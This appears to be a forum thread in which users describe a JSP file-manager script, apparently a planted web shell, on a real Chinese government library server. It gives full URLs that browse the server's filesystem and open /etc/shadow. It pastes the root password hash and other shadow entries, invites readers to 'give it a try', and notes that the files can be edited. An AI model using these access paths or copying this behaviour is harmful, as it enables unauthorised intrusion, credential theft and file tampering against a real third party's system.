<div class="\"tbscode_standard_quote_headline\""><img alt="\"Quote\"" src="%5C">Quote from rhican:</div><div class="\"tbscode_standard_quote\"">so i'm going to assume it's a honeypot, not that the md5 hash above will be that easy to crack</div><br>especially as it is no <a href="%5C"><img alt="\"link\"" src="%5C">md5-hash</a>, I think this is <a href="%5C"><img alt="\"link\"" src="%5C">DES</a><br><br>thanks for this site .... perhaps its an chinese challenge site for bureaucrats <img alt="\":D\"" src="%5C"> I can't imagine that this would work for a non-challenge site which is made by a halfway competent webmaster<br><br><br>edit: hmm .... seems as if somebody has uploaded a skript he didn't know what it was ... it seems as if i can browse through all files on this server..<br>edit2: it even seems as if you could edit files there .... realy strange...
maybe in the shadow file...<br>[http://portal.sdxlib.gov.cn/xkdh/upload/4F3ED6E10CF3ECED.jsp?sort=1&editfile=%2Fetc%2Fshadow]<br><br>root:$1$omN0zmQV$dD5uC.bf8raQLvckICm/q0:13694:0:::::<br>bin:*:9797:0:::::<br>daemon:*:9797:0:::::<br>adm:*:9797:0:::::<br>lp:*:9797:0:::::<br>sync:*:9797:0:::::<br>shutdown:*:9797:0:::::<br>halt:*:9797:0:::::<br>mail:*:9797:0:::::<br>news:*:9797:0:::::<br>uucp:*:9797:0:::::<br>operator:*:9797:0:::::<br>games:*:9797:0:::::<br>ftp:*:9797:0:::::<br>smmsp:*:9797:0:::::<br>rpc:*:9797:0:::::<br>sshd:*:9797:0:::::<br>gdm:*:9797:0:::::<br>pop:*:9797:0:::::<br>nobody:*:9797:0:::::
Being a gov site doesn't mean it's secure, unless it's the ministry of defense or the likes <img alt="\":P\"" src="%5C"><br>But don't you know the whole file system is browsable: <a href="%5C"><img alt="\"link\"" src="%5C">http://portal.sdxlib.gov.cn/xkdh/upload/4F3ED6E10CF3ECED.jsp?sort=1&dir=%2F</a><br>Give it a try, guys <img alt="\":wink:\"" src="%5C"><br>Update: maybe you guys want to see the homepage: http://portal.sdxlib.gov.cn/ <img alt="\";)\"" src="%5C">
Yeah it's pretty bad, seing as google already knows ( i stumbled upon it because I googled for something that happened to be in one of the documentation of some program, that was installed. didn't have time to fully analyse it.<br><br>this is why i never get any work done, a simple google all to often brings me across something that's just too bad to ignore <br><br>it had to be tomcat ofcourse, java ... <img alt="\":D\"" src="%5C">
<div class="\"tbscode_standard_quote_headline\""><img alt="\"Quote\"" src="%5C">Quote from <a href="%5C">rhican</a>:</div><div class="\"tbscode_standard_quote\"">it had to be tomcat ofcourse, java ... <img alt="\":D\"" src="%5C"></div><br>They really should have labelled it \"Not suitable for noobs\" <img alt="\":P\"" src="%5C">